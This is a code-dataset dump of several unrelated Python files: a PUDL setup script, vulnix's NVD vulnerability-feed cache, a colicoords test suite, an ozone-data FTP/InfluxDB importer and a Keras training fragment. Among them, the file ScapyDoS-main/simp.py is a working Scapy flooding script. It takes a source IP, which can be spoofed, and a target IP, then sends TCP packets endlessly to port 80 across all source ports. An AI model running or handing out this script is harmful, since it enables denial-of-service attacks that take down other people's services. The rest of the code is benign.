with open(path + "setup.json", "r") as data:
setup = json.load(data)
return model, setup["classes"]
| es | 0.357063 | # Importa cosas de Keras API # Importa callbacks del modelo # Importa cosas para graficar el entrenameinto # Function that continues the training of a model # Args: # path_to_model: path were to find the model and setup # dataset: tuple of tensorflow dataset of (train, test) # carga el setup del modelo # carga el estado de entrenamiento # carga el modelo # vuelve a compilar el modelo # Method that starts the model training # Args: # setup: Dictionary with the model setup # model: the keras.Model architecture to train # dataset: tuple of tensorflow dataset of (train, test) # Asegura que el path sea el correcto # Borra las carpetas si ya existen # crea carpeta donde se van a guardar los checkpoints # Escribe el setup del entrenamiento # Dibuja la arquitectura del modelo # Crea optimizador, por defecto Adam #opt = RMSprop(lr=setup["learning_rate"]) # Compila el modelo # Metodo, que entrena un modelo ya compilado, implementa callbacks de # tensorboard, log a un archivo CSV y creacion de checkpoints cuando ocurre # mejoras en el loss, tambien grafica y crea matriz de confusion # Args: # compiled_model: keras.Model ya compilado # dataset: tuple of tensorflow dataset of (train, test) # opt: keras.Optimizer used in training # epochs: The number of epochs to train # initial_epoch: Epoch to start training, 0 for normal training # continue_train: if the model is continuing training # classes: array of classes that the model predict # El modelo debe de estar complicado # obtiene el dataset # Callbacks durante entrenamiento #TrainingCheckPoints(path+"checkpoints/", relative_epoch=relative), # Entrena el modelo # Guarda el modelo # Crea grafica del entrenamiento # Crea confusion matrix | 2.756907 | 3 |
setup.py | truggles/pudl | 0 | 8011 | <gh_stars>0
#!/usr/bin/env python
"""Setup script to make PUDL directly installable with pip."""
import os
from pathlib import Path
from setuptools import find_packages, setup
install_requires = [
'coloredlogs',
'datapackage>=1.9.0',
'dbfread',
'goodtables',
'matplotlib',
'networkx>=2.2',
'numpy',
'pandas>=0.24',
'pyarrow>=0.14.0',
'pyyaml',
'scikit-learn>=0.20',
'scipy',
'sqlalchemy>=1.3.0',
'tableschema',
'tableschema-sql>=1.1.0',
'timezonefinder',
'xlsxwriter',
]
# We are installing the PUDL module to build the docs, but the C libraries
# required to build snappy aren't available on RTD, so we need to exclude it
# from the installed dependencies here, and mock it for import in docs/conf.py
# using the autodoc_mock_imports parameter:
if not os.getenv('READTHEDOCS'):
install_requires.append('python-snappy')
doc_requires = [
'doc8',
'sphinx',
'sphinx_rtd_theme',
]
test_requires = [
'bandit',
'coverage',
'doc8',
'flake8',
'flake8-docstrings',
'flake8-builtins',
'pep8-naming',
'pre-commit',
'pydocstyle',
'pytest',
'pytest-cov',
'nbval',
]
readme_path = Path(__file__).parent / "README.rst"
long_description = readme_path.read_text()
setup(
name='catalystcoop.pudl',
description='An open data processing pipeline for public US utility data.',
long_description=long_description,
long_description_content_type='text/x-rst',
use_scm_version=True,
author='Catalyst Cooperative',
author_email='<EMAIL>',
maintainer='<NAME>',
maintainer_email='<EMAIL>yst.coop',
url="https://catalyst.coop/pudl",
project_urls={
"Source": "https://github.com/catalyst-cooperative/pudl",
"Documentation": "https://catalystcoop-pudl.readthedocs.io",
"Issue Tracker": "https://github.com/catalyst-cooperative/pudl/issues",
},
license='MIT',
keywords=[
'electricity', 'energy', 'data', 'analysis', 'mcoe', 'climate change',
'finance', 'eia 923', 'eia 860', 'ferc', 'form 1', 'epa ampd',
'epa cems', 'coal', 'natural gas', ],
python_requires='>=3.7, <3.8.0a0',
setup_requires=['setuptools_scm'],
install_requires=install_requires,
extras_require={
"doc": doc_requires,
"test": test_requires,
},
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Science/Research',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.7',
'Topic :: Scientific/Engineering',
],
packages=find_packages('src'),
package_dir={'': 'src'},
# package_data is data that is deployed within the python package on the
# user's system. setuptools will get whatever is listed in MANIFEST.in
include_package_data=True,
# This defines the interfaces to the command line scripts we're including:
entry_points={
'console_scripts': [
'pudl_data = pudl.workspace.datastore_cli:main',
'pudl_setup = pudl.workspace.setup_cli:main',
'pudl_etl = pudl.cli:main',
'datapkg_to_sqlite = pudl.convert.datapkg_to_sqlite:main',
'ferc1_to_sqlite = pudl.convert.ferc1_to_sqlite:main',
'epacems_to_parquet = pudl.convert.epacems_to_parquet:main',
]
},
)
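# A typical development install against the extras declared above would look
# something like this (the exact command is an assumption, since the project's
# installation docs are not part of this file):
#
#   pip install --editable ".[test,doc]"
#
# After installation, the console scripts listed in entry_points (pudl_data,
# pudl_setup, pudl_etl, ...) become available on the PATH.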
| #!/usr/bin/env python
"""Setup script to make PUDL directly installable with pip."""
import os
from pathlib import Path
from setuptools import find_packages, setup
install_requires = [
'coloredlogs',
'datapackage>=1.9.0',
'dbfread',
'goodtables',
'matplotlib',
'networkx>=2.2',
'numpy',
'pandas>=0.24',
'pyarrow>=0.14.0',
'pyyaml',
'scikit-learn>=0.20',
'scipy',
'sqlalchemy>=1.3.0',
'tableschema',
'tableschema-sql>=1.1.0',
'timezonefinder',
'xlsxwriter',
]
# We are installing the PUDL module to build the docs, but the C libraries
# required to build snappy aren't available on RTD, so we need to exclude it
# from the installed dependencies here, and mock it for import in docs/conf.py
# using the autodoc_mock_imports parameter:
if not os.getenv('READTHEDOCS'):
install_requires.append('python-snappy')
doc_requires = [
'doc8',
'sphinx',
'sphinx_rtd_theme',
]
test_requires = [
'bandit',
'coverage',
'doc8',
'flake8',
'flake8-docstrings',
'flake8-builtins',
'pep8-naming',
'pre-commit',
'pydocstyle',
'pytest',
'pytest-cov',
'nbval',
]
readme_path = Path(__file__).parent / "README.rst"
long_description = readme_path.read_text()
setup(
name='catalystcoop.pudl',
description='An open data processing pipeline for public US utility data.',
long_description=long_description,
long_description_content_type='text/x-rst',
use_scm_version=True,
author='Catalyst Cooperative',
author_email='<EMAIL>',
maintainer='<NAME>',
maintainer_email='<EMAIL>yst.coop',
url="https://catalyst.coop/pudl",
project_urls={
"Source": "https://github.com/catalyst-cooperative/pudl",
"Documentation": "https://catalystcoop-pudl.readthedocs.io",
"Issue Tracker": "https://github.com/catalyst-cooperative/pudl/issues",
},
license='MIT',
keywords=[
'electricity', 'energy', 'data', 'analysis', 'mcoe', 'climate change',
'finance', 'eia 923', 'eia 860', 'ferc', 'form 1', 'epa ampd',
'epa cems', 'coal', 'natural gas', ],
python_requires='>=3.7, <3.8.0a0',
setup_requires=['setuptools_scm'],
install_requires=install_requires,
extras_require={
"doc": doc_requires,
"test": test_requires,
},
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Science/Research',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.7',
'Topic :: Scientific/Engineering',
],
packages=find_packages('src'),
package_dir={'': 'src'},
# package_data is data that is deployed within the python package on the
# user's system. setuptools will get whatever is listed in MANIFEST.in
include_package_data=True,
# This defines the interfaces to the command line scripts we're including:
entry_points={
'console_scripts': [
'pudl_data = pudl.workspace.datastore_cli:main',
'pudl_setup = pudl.workspace.setup_cli:main',
'pudl_etl = pudl.cli:main',
'datapkg_to_sqlite = pudl.convert.datapkg_to_sqlite:main',
'ferc1_to_sqlite = pudl.convert.ferc1_to_sqlite:main',
'epacems_to_parquet = pudl.convert.epacems_to_parquet:main',
]
},
) | en | 0.861123 | #!/usr/bin/env python Setup script to make PUDL directly installable with pip. # We are installing the PUDL module to build the docs, but the C libraries # required to build snappy aren't available on RTD, so we need to exclude it # from the installed dependencies here, and mock it for import in docs/conf.py # using the autodoc_mock_imports parameter: # package_data is data that is deployed within the python package on the # user's system. setuptools will get whatever is listed in MANIFEST.in # This defines the interfaces to the command line scripts we're including: | 1.658067 | 2 |
src/vulnix/nvd.py | dermetfan/vulnix | 217 | 8012 | <filename>src/vulnix/nvd.py
from BTrees import OOBTree
from datetime import datetime, date, timedelta
from persistent import Persistent
from .vulnerability import Vulnerability
import fcntl
import glob
import gzip
import json
import logging
import os
import os.path as p
import requests
import transaction
import ZODB
import ZODB.FileStorage
DEFAULT_MIRROR = 'https://nvd.nist.gov/feeds/json/cve/1.1/'
DEFAULT_CACHE_DIR = '~/.cache/vulnix'
_log = logging.getLogger(__name__)
class NVD(object):
"""Access to the National Vulnerability Database.
https://nvd.nist.gov/
"""
def __init__(self, mirror=DEFAULT_MIRROR, cache_dir=DEFAULT_CACHE_DIR):
self.mirror = mirror.rstrip('/') + '/'
self.cache_dir = p.expanduser(cache_dir)
current = date.today().year
self.available_archives = [y for y in range(current-5, current+1)]
def lock(self):
self._lock = open(p.join(self.cache_dir, 'lock'), 'a')
try:
fcntl.lockf(self._lock, fcntl.LOCK_EX | fcntl.LOCK_NB)
except OSError:
_log.info('Waiting for NVD lock...')
fcntl.lockf(self._lock, fcntl.LOCK_EX)
def __enter__(self):
"""Keeps database connection open while in this context."""
_log.debug('Opening database in %s', self.cache_dir)
os.makedirs(self.cache_dir, exist_ok=True)
self.lock()
self._db = ZODB.DB(ZODB.FileStorage.FileStorage(
p.join(self.cache_dir, 'Data.fs')))
self._connection = self._db.open()
self._root = self._connection.root()
try:
self._root.setdefault('advisory', OOBTree.OOBTree())
self._root.setdefault('by_product', OOBTree.OOBTree())
self._root.setdefault('meta', Meta())
# may trigger exceptions if the database is inconsistent
list(self._root['by_product'].keys())
if 'archives' in self._root:
_log.warn('Pre-1.9.0 database found - rebuilding')
self.reinit()
except (TypeError, EOFError):
_log.warn('Incompatible objects found in database - rebuilding DB')
self.reinit()
return self
def __exit__(self, exc_type=None, exc_value=None, exc_tb=None):
if exc_type is None:
if self.meta.should_pack():
_log.debug('Packing database')
self._db.pack()
transaction.commit()
else:
transaction.abort()
self._connection.close()
self._db.close()
self._lock = None
def reinit(self):
"""Remove old DB and rebuild it from scratch."""
self._root = None
transaction.abort()
self._connection.close()
self._db = None
for f in glob.glob(p.join(self.cache_dir, "Data.fs*")):
os.unlink(f)
self._db = ZODB.DB(ZODB.FileStorage.FileStorage(
p.join(self.cache_dir, 'Data.fs')))
self._connection = self._db.open()
self._root = self._connection.root()
self._root['advisory'] = OOBTree.OOBTree()
self._root['by_product'] = OOBTree.OOBTree()
self._root['meta'] = Meta()
@property
def meta(self):
return self._root['meta']
def relevant_archives(self):
"""Returns list of NVD archives to check.
If there was an update within the last two hours, nothing is
done. If the last update was recent enough to be covered by
the 'modified' feed, only that is checked. Else, all feeds
are checked.
"""
last_update = self.meta.last_update
if last_update > datetime.now() - timedelta(hours=2):
return []
# the "modified" feed is sufficient if used frequently enough
if last_update > datetime.now() - timedelta(days=7):
return ['modified']
return self.available_archives
def update(self):
"""Download archives (if changed) and add CVEs to database."""
changed = []
for a in self.relevant_archives():
arch = Archive(a)
changed.append(arch.download(self.mirror, self.meta))
self.add(arch)
if any(changed):
self.meta.last_update = datetime.now()
self.reindex()
def add(self, archive):
advisories = self._root['advisory']
for (cve_id, adv) in archive.items():
advisories[cve_id] = adv
def reindex(self):
"""Regenerate product index."""
_log.info('Reindexing database')
del self._root['by_product']
bp = OOBTree.OOBTree()
for vuln in self._root['advisory'].values():
if vuln.nodes:
for prod in (n.product for n in vuln.nodes):
bp.setdefault(prod, [])
bp[prod].append(vuln)
self._root['by_product'] = bp
transaction.commit()
def by_id(self, cve_id):
"""Returns vuln or raises KeyError."""
return self._root['advisory'][cve_id]
def by_product(self, product):
"""Returns list of matching vulns or empty list."""
try:
return self._root['by_product'][product]
except KeyError:
return []
def affected(self, pname, version):
"""Returns list of matching vulnerabilities."""
res = set()
for vuln in self.by_product(pname):
if vuln.match(pname, version):
res.add(vuln)
return res
class Archive:
"""Single JSON data structure from NIST NVD."""
def __init__(self, name):
"""Creates JSON feed object.
`name` consists of a year or "modified".
"""
self.name = name
self.download_uri = 'nvdcve-1.1-{}.json.gz'.format(name)
self.advisories = {}
def download(self, mirror, meta):
"""Fetches compressed JSON data from NIST.
Nothing is done if we have already seen the same version of
the feed before.
Returns True if anything has been loaded successfully.
"""
url = mirror + self.download_uri
_log.info('Loading %s', url)
r = requests.get(url, headers=meta.headers_for(url))
r.raise_for_status()
if r.status_code == 200:
_log.debug('Loading JSON feed "%s"', self.name)
self.parse(gzip.decompress(r.content))
meta.update_headers_for(url, r.headers)
return True
else:
_log.debug('Skipping JSON feed "%s" (%s)', self.name, r.reason)
return False
def parse(self, nvd_json):
added = 0
raw = json.loads(nvd_json)
for item in raw['CVE_Items']:
try:
vuln = Vulnerability.parse(item)
self.advisories[vuln.cve_id] = vuln
added += 1
except ValueError:
_log.debug('Failed to parse NVD item: %s', item)
_log.debug("Added %s vulnerabilities", added)
def items(self):
return self.advisories.items()
class Meta(Persistent):
    """Metadata for database maintenance control"""
pack_counter = 0
last_update = datetime(1970, 1, 1)
etag = None
def should_pack(self):
self.pack_counter += 1
if self.pack_counter > 25:
self.pack_counter = 0
return True
return False
def headers_for(self, url):
"""Returns dict of additional request headers."""
if self.etag and url in self.etag:
return {'If-None-Match': self.etag[url]}
return {}
def update_headers_for(self, url, resp_headers):
"""Updates self from HTTP response headers."""
if 'ETag' in resp_headers:
if self.etag is None:
self.etag = OOBTree.OOBTree()
self.etag[url] = resp_headers['ETag']
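# Minimal usage sketch: ties together the NVD context manager, update() and
# affected() defined above. The product name and version are made up for
# illustration, and update() needs network access to the configured mirror.
if __name__ == "__main__":
    with NVD() as nvd:
        nvd.update()
        for cve_id in sorted(v.cve_id for v in nvd.affected("openssl", "1.0.1")):
            print(cve_id)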
| <filename>src/vulnix/nvd.py
from BTrees import OOBTree
from datetime import datetime, date, timedelta
from persistent import Persistent
from .vulnerability import Vulnerability
import fcntl
import glob
import gzip
import json
import logging
import os
import os.path as p
import requests
import transaction
import ZODB
import ZODB.FileStorage
DEFAULT_MIRROR = 'https://nvd.nist.gov/feeds/json/cve/1.1/'
DEFAULT_CACHE_DIR = '~/.cache/vulnix'
_log = logging.getLogger(__name__)
class NVD(object):
"""Access to the National Vulnerability Database.
https://nvd.nist.gov/
"""
def __init__(self, mirror=DEFAULT_MIRROR, cache_dir=DEFAULT_CACHE_DIR):
self.mirror = mirror.rstrip('/') + '/'
self.cache_dir = p.expanduser(cache_dir)
current = date.today().year
self.available_archives = [y for y in range(current-5, current+1)]
def lock(self):
self._lock = open(p.join(self.cache_dir, 'lock'), 'a')
try:
fcntl.lockf(self._lock, fcntl.LOCK_EX | fcntl.LOCK_NB)
except OSError:
_log.info('Waiting for NVD lock...')
fcntl.lockf(self._lock, fcntl.LOCK_EX)
def __enter__(self):
"""Keeps database connection open while in this context."""
_log.debug('Opening database in %s', self.cache_dir)
os.makedirs(self.cache_dir, exist_ok=True)
self.lock()
self._db = ZODB.DB(ZODB.FileStorage.FileStorage(
p.join(self.cache_dir, 'Data.fs')))
self._connection = self._db.open()
self._root = self._connection.root()
try:
self._root.setdefault('advisory', OOBTree.OOBTree())
self._root.setdefault('by_product', OOBTree.OOBTree())
self._root.setdefault('meta', Meta())
# may trigger exceptions if the database is inconsistent
list(self._root['by_product'].keys())
if 'archives' in self._root:
_log.warn('Pre-1.9.0 database found - rebuilding')
self.reinit()
except (TypeError, EOFError):
_log.warn('Incompatible objects found in database - rebuilding DB')
self.reinit()
return self
def __exit__(self, exc_type=None, exc_value=None, exc_tb=None):
if exc_type is None:
if self.meta.should_pack():
_log.debug('Packing database')
self._db.pack()
transaction.commit()
else:
transaction.abort()
self._connection.close()
self._db.close()
self._lock = None
def reinit(self):
"""Remove old DB and rebuild it from scratch."""
self._root = None
transaction.abort()
self._connection.close()
self._db = None
for f in glob.glob(p.join(self.cache_dir, "Data.fs*")):
os.unlink(f)
self._db = ZODB.DB(ZODB.FileStorage.FileStorage(
p.join(self.cache_dir, 'Data.fs')))
self._connection = self._db.open()
self._root = self._connection.root()
self._root['advisory'] = OOBTree.OOBTree()
self._root['by_product'] = OOBTree.OOBTree()
self._root['meta'] = Meta()
@property
def meta(self):
return self._root['meta']
def relevant_archives(self):
"""Returns list of NVD archives to check.
If there was an update within the last two hours, nothing is
done. If the last update was recent enough to be covered by
the 'modified' feed, only that is checked. Else, all feeds
are checked.
"""
last_update = self.meta.last_update
if last_update > datetime.now() - timedelta(hours=2):
return []
# the "modified" feed is sufficient if used frequently enough
if last_update > datetime.now() - timedelta(days=7):
return ['modified']
return self.available_archives
def update(self):
"""Download archives (if changed) and add CVEs to database."""
changed = []
for a in self.relevant_archives():
arch = Archive(a)
changed.append(arch.download(self.mirror, self.meta))
self.add(arch)
if any(changed):
self.meta.last_update = datetime.now()
self.reindex()
def add(self, archive):
advisories = self._root['advisory']
for (cve_id, adv) in archive.items():
advisories[cve_id] = adv
def reindex(self):
"""Regenerate product index."""
_log.info('Reindexing database')
del self._root['by_product']
bp = OOBTree.OOBTree()
for vuln in self._root['advisory'].values():
if vuln.nodes:
for prod in (n.product for n in vuln.nodes):
bp.setdefault(prod, [])
bp[prod].append(vuln)
self._root['by_product'] = bp
transaction.commit()
def by_id(self, cve_id):
"""Returns vuln or raises KeyError."""
return self._root['advisory'][cve_id]
def by_product(self, product):
"""Returns list of matching vulns or empty list."""
try:
return self._root['by_product'][product]
except KeyError:
return []
def affected(self, pname, version):
"""Returns list of matching vulnerabilities."""
res = set()
for vuln in self.by_product(pname):
if vuln.match(pname, version):
res.add(vuln)
return res
class Archive:
"""Single JSON data structure from NIST NVD."""
def __init__(self, name):
"""Creates JSON feed object.
`name` consists of a year or "modified".
"""
self.name = name
self.download_uri = 'nvdcve-1.1-{}.json.gz'.format(name)
self.advisories = {}
def download(self, mirror, meta):
"""Fetches compressed JSON data from NIST.
Nothing is done if we have already seen the same version of
the feed before.
Returns True if anything has been loaded successfully.
"""
url = mirror + self.download_uri
_log.info('Loading %s', url)
r = requests.get(url, headers=meta.headers_for(url))
r.raise_for_status()
if r.status_code == 200:
_log.debug('Loading JSON feed "%s"', self.name)
self.parse(gzip.decompress(r.content))
meta.update_headers_for(url, r.headers)
return True
else:
_log.debug('Skipping JSON feed "%s" (%s)', self.name, r.reason)
return False
def parse(self, nvd_json):
added = 0
raw = json.loads(nvd_json)
for item in raw['CVE_Items']:
try:
vuln = Vulnerability.parse(item)
self.advisories[vuln.cve_id] = vuln
added += 1
except ValueError:
_log.debug('Failed to parse NVD item: %s', item)
_log.debug("Added %s vulnerabilities", added)
def items(self):
return self.advisories.items()
class Meta(Persistent):
    """Metadata for database maintenance control"""
pack_counter = 0
last_update = datetime(1970, 1, 1)
etag = None
def should_pack(self):
self.pack_counter += 1
if self.pack_counter > 25:
self.pack_counter = 0
return True
return False
def headers_for(self, url):
"""Returns dict of additional request headers."""
if self.etag and url in self.etag:
return {'If-None-Match': self.etag[url]}
return {}
def update_headers_for(self, url, resp_headers):
"""Updates self from HTTP response headers."""
if 'ETag' in resp_headers:
if self.etag is None:
self.etag = OOBTree.OOBTree()
self.etag[url] = resp_headers['ETag']
| en | 0.878714 | Access to the National Vulnerability Database. https://nvd.nist.gov/ Keeps database connection open while in this context. # may trigger exceptions if the database is inconsistent Remove old DB and rebuild it from scratch. Returns list of NVD archives to check. If there was an update within the last two hours, nothing is done. If the last update was recent enough to be covered by the 'modified' feed, only that is checked. Else, all feeds are checked. # the "modified" feed is sufficient if used frequently enough Download archives (if changed) and add CVEs to database. Regenerate product index. Returns vuln or raises KeyError. Returns list of matching vulns or empty list. Returns list of matching vulnerabilities. Single JSON data structure from NIST NVD. Creates JSON feed object. `name` consists of a year or "modified". Fetches compressed JSON data from NIST. Nothing is done if we have already seen the same version of the feed before. Returns True if anything has been loaded successfully. Metadate for database maintenance control Returns dict of additional request headers. Updates self from HTTP response headers. | 2.230697 | 2 |
ScapyDoS-main/simp.py | Zusyaku/Termux-And-Lali-Linux-V2 | 2 | 8013 | from scapy.all import *
src = input("Source IP: ")
target = input("Target IP: ")
i=1
while True:
for srcport in range(1, 65535):
ip = IP(src=src, dst=target)
tcp = TCP(sport=srcport, dport=80)
pkt = ip / tcp
send(pkt, inter= .0001)
print("Packet Sent ", i)
i=i+1 | from scapy.all import *
src = input("Source IP: ")
target = input("Target IP: ")
i=1
while True:
for srcport in range(1, 65535):
ip = IP(src=src, dst=target)
tcp = TCP(sport=srcport, dport=80)
pkt = ip / tcp
send(pkt, inter= .0001)
print("Packet Sent ", i)
i=i+1 | none | 1 | 2.934474 | 3 |
|
test/test_basic_functions.py | azagajewski/ColiCoords | 18 | 8014 | import hashlib
import unittest
from colicoords.cell import Cell, CellList
from colicoords.preprocess import data_to_cells
from test import testcase
from test.test_functions import load_testdata
class DataTest(testcase.ArrayTestCase):
def setUp(self):
self.data = load_testdata('ds1')
def test_data_slicing(self):
sl1 = self.data[2:5, :, :]
self.assertEqual(sl1.shape, (3, 512, 512))
sl2 = self.data[:, 20:40, 100:200]
self.assertEqual(sl2.shape, (10, 20, 100))
def test_data_copy(self):
m0 = self.data.binary_img.mean()
data_copy = self.data.copy()
self.assertEqual(m0, self.data.binary_img.mean())
data_copy.data_dict['binary'] += 20
self.assertEqual(m0, self.data.binary_img.mean())
self.assertEqual(data_copy.binary_img.mean(), m0 + 20)
def _test_cell_list(self):
#todo check order
print(hashlib.md5(self.data).hexdigest())
cell_list = data_to_cells(self.data, initial_crop=2, cell_frac=0.5, rotate='binary')
print(hashlib.md5(self.data).hexdigest())
cell_list = data_to_cells(self.data, initial_crop=2, cell_frac=0.5, rotate='binary')
print(hashlib.md5(self.data).hexdigest())
d = self.data.copy()
print(d == self.data)
cl = CellList(cell_list)
self.assertEqual(len(cl), 48)
c5 = cl[5]
self.assertIsInstance(c5, Cell)
del cl[5]
self.assertEqual(len(cl), 47)
self.assertTrue(cl[3] in cl)
cl.append(c5)
self.assertTrue(c5 in cl)
vol = cl.volume
self.assertEqual(len(vol), 48)
class CellListTest(testcase.ArrayTestCase):
def setUp(self):
data = load_testdata('ds1')
self.cell_list = data_to_cells(data)
def test_slicing(self):
sliced = self.cell_list[:5]
self.assertIsInstance(sliced, CellList)
if __name__ == '__main__':
unittest.main() | import hashlib
import unittest
from colicoords.cell import Cell, CellList
from colicoords.preprocess import data_to_cells
from test import testcase
from test.test_functions import load_testdata
class DataTest(testcase.ArrayTestCase):
def setUp(self):
self.data = load_testdata('ds1')
def test_data_slicing(self):
sl1 = self.data[2:5, :, :]
self.assertEqual(sl1.shape, (3, 512, 512))
sl2 = self.data[:, 20:40, 100:200]
self.assertEqual(sl2.shape, (10, 20, 100))
def test_data_copy(self):
m0 = self.data.binary_img.mean()
data_copy = self.data.copy()
self.assertEqual(m0, self.data.binary_img.mean())
data_copy.data_dict['binary'] += 20
self.assertEqual(m0, self.data.binary_img.mean())
self.assertEqual(data_copy.binary_img.mean(), m0 + 20)
def _test_cell_list(self):
#todo check order
print(hashlib.md5(self.data).hexdigest())
cell_list = data_to_cells(self.data, initial_crop=2, cell_frac=0.5, rotate='binary')
print(hashlib.md5(self.data).hexdigest())
cell_list = data_to_cells(self.data, initial_crop=2, cell_frac=0.5, rotate='binary')
print(hashlib.md5(self.data).hexdigest())
d = self.data.copy()
print(d == self.data)
cl = CellList(cell_list)
self.assertEqual(len(cl), 48)
c5 = cl[5]
self.assertIsInstance(c5, Cell)
del cl[5]
self.assertEqual(len(cl), 47)
self.assertTrue(cl[3] in cl)
cl.append(c5)
self.assertTrue(c5 in cl)
vol = cl.volume
self.assertEqual(len(vol), 48)
class CellListTest(testcase.ArrayTestCase):
def setUp(self):
data = load_testdata('ds1')
self.cell_list = data_to_cells(data)
def test_slicing(self):
sliced = self.cell_list[:5]
self.assertIsInstance(sliced, CellList)
if __name__ == '__main__':
unittest.main() | en | 0.379612 | #todo check order | 2.557771 | 3 |
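The ColiCoords file above is a plain unittest module, so it can be run with the standard library runner or with pytest; the exact invocations below are assumptions rather than commands taken from the repository's CI configuration.

    python -m unittest test.test_basic_functions
    python -m pytest test/test_basic_functions.py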
data_importer_ftp.py | supsi-dacd-isaac/oasi-ozone-forecaster | 0 | 8015 | # --------------------------------------------------------------------------- #
# Importing section
# --------------------------------------------------------------------------- #
import os
import sys
import argparse
import logging
import json
from classes.alerts import SlackClient
from influxdb import InfluxDBClient
from classes.data_manager import DataManager
# --------------------------------------------------------------------------- #
# Functions
# -----------------------------------------------------------------------------#
def slack_msg():
slack_client = SlackClient(logger, cfg)
if bool(dm.files_not_correctly_handled):
str_err = ''
for k in dm.files_not_correctly_handled:
str_err = '%sFailed handling of file %s; Exception: %s\n' % (str_err, k, dm.files_not_correctly_handled[k])
slack_client.send_alert_message('OZONE FORECASTER - RAW FILES ALARM:\n%s' % str_err, '#ff0000')
else:
slack_client.send_alert_message('OZONE FORECASTER - RAW FILES PROPERLY HANDLED', '#00ff00')
# --------------------------------------------------------------------------- #
# Main
# --------------------------------------------------------------------------- #
if __name__ == "__main__":
# --------------------------------------------------------------------------- #
# Configuration file
# --------------------------------------------------------------------------- #
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument("-c", help="configuration file")
arg_parser.add_argument("-l", help="log file (optional, if empty log redirected on stdout)")
args = arg_parser.parse_args()
config_file = args.c
if os.path.isfile(config_file) is False:
print('\nATTENTION! Unable to open configuration file %s\n' % config_file)
sys.exit(1)
cfg = json.loads(open(args.c).read())
conns_cfg = json.loads(open(cfg['connectionsFile']).read())
cfg.update(conns_cfg)
# --------------------------------------------------------------------------- #
# Set logging object
# --------------------------------------------------------------------------- #
if not args.l:
log_file = None
else:
log_file = args.l
logger = logging.getLogger()
logging.basicConfig(format='%(asctime)-15s::%(levelname)s::%(funcName)s::%(message)s', level=logging.INFO,
filename=log_file)
# --------------------------------------------------------------------------- #
# Starting program
# --------------------------------------------------------------------------- #
logger.info("Starting program")
# --------------------------------------------------------------------------- #
# InfluxDB connection
# --------------------------------------------------------------------------- #
logger.info('Connection to InfluxDb server on socket [%s:%s]' % (cfg['influxDB']['host'], cfg['influxDB']['port']))
try:
influx_client = InfluxDBClient(host=cfg['influxDB']['host'], port=cfg['influxDB']['port'],
password=cfg['influxDB']['password'], username=cfg['influxDB']['user'],
database=cfg['influxDB']['database'], ssl=cfg['influxDB']['ssl'])
except Exception as e:
logger.error('EXCEPTION: %s' % str(e))
sys.exit(3)
logger.info('Connection successful')
dm = DataManager(influx_client, cfg, logger)
# Download files from the FTP server
if cfg['ftp']['enabled'] is True:
logger.info('Download data from FTP server')
dm.open_ftp_connection()
dm.download_remote_files()
# Insert data into InfluxDB
if cfg['influxDB']['dataImporting'] is True:
logger.info('Importing in InfluxDB of raw data related to files in %s' % cfg['ftp']['localFolders']['tmp'])
dm.insert_data()
# Delete files correctly handled on the FTP server and close the FTP connection
if cfg['ftp']['enabled'] is True:
if cfg['ftp']['deleteRemoteFile'] is True:
logger.info('Delete handled files from FTP server')
dm.delete_remote_files()
dm.close_ftp_connection()
# Slack alert
if cfg['alerts']['slack']['enabled'] is True:
slack_msg()
logger.info("Ending program")
| # --------------------------------------------------------------------------- #
# Importing section
# --------------------------------------------------------------------------- #
import os
import sys
import argparse
import logging
import json
from classes.alerts import SlackClient
from influxdb import InfluxDBClient
from classes.data_manager import DataManager
# --------------------------------------------------------------------------- #
# Functions
# -----------------------------------------------------------------------------#
def slack_msg():
slack_client = SlackClient(logger, cfg)
if bool(dm.files_not_correctly_handled):
str_err = ''
for k in dm.files_not_correctly_handled:
str_err = '%sFailed handling of file %s; Exception: %s\n' % (str_err, k, dm.files_not_correctly_handled[k])
slack_client.send_alert_message('OZONE FORECASTER - RAW FILES ALARM:\n%s' % str_err, '#ff0000')
else:
slack_client.send_alert_message('OZONE FORECASTER - RAW FILES PROPERLY HANDLED', '#00ff00')
# --------------------------------------------------------------------------- #
# Main
# --------------------------------------------------------------------------- #
if __name__ == "__main__":
# --------------------------------------------------------------------------- #
# Configuration file
# --------------------------------------------------------------------------- #
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument("-c", help="configuration file")
arg_parser.add_argument("-l", help="log file (optional, if empty log redirected on stdout)")
args = arg_parser.parse_args()
config_file = args.c
if os.path.isfile(config_file) is False:
print('\nATTENTION! Unable to open configuration file %s\n' % config_file)
sys.exit(1)
cfg = json.loads(open(args.c).read())
conns_cfg = json.loads(open(cfg['connectionsFile']).read())
cfg.update(conns_cfg)
# --------------------------------------------------------------------------- #
# Set logging object
# --------------------------------------------------------------------------- #
if not args.l:
log_file = None
else:
log_file = args.l
logger = logging.getLogger()
logging.basicConfig(format='%(asctime)-15s::%(levelname)s::%(funcName)s::%(message)s', level=logging.INFO,
filename=log_file)
# --------------------------------------------------------------------------- #
# Starting program
# --------------------------------------------------------------------------- #
logger.info("Starting program")
# --------------------------------------------------------------------------- #
# InfluxDB connection
# --------------------------------------------------------------------------- #
logger.info('Connection to InfluxDb server on socket [%s:%s]' % (cfg['influxDB']['host'], cfg['influxDB']['port']))
try:
influx_client = InfluxDBClient(host=cfg['influxDB']['host'], port=cfg['influxDB']['port'],
password=cfg['influxDB']['password'], username=cfg['influxDB']['user'],
database=cfg['influxDB']['database'], ssl=cfg['influxDB']['ssl'])
except Exception as e:
logger.error('EXCEPTION: %s' % str(e))
sys.exit(3)
logger.info('Connection successful')
dm = DataManager(influx_client, cfg, logger)
# Download files from the FTP server
if cfg['ftp']['enabled'] is True:
logger.info('Download data from FTP server')
dm.open_ftp_connection()
dm.download_remote_files()
# Insert data into InfluxDB
if cfg['influxDB']['dataImporting'] is True:
logger.info('Importing in InfluxDB of raw data related to files in %s' % cfg['ftp']['localFolders']['tmp'])
dm.insert_data()
# Delete files correctly handled on the FTP server and close the FTP connection
if cfg['ftp']['enabled'] is True:
if cfg['ftp']['deleteRemoteFile'] is True:
logger.info('Delete handled files from FTP server')
dm.delete_remote_files()
dm.close_ftp_connection()
# Slack alert
if cfg['alerts']['slack']['enabled'] is True:
slack_msg()
logger.info("Ending program")
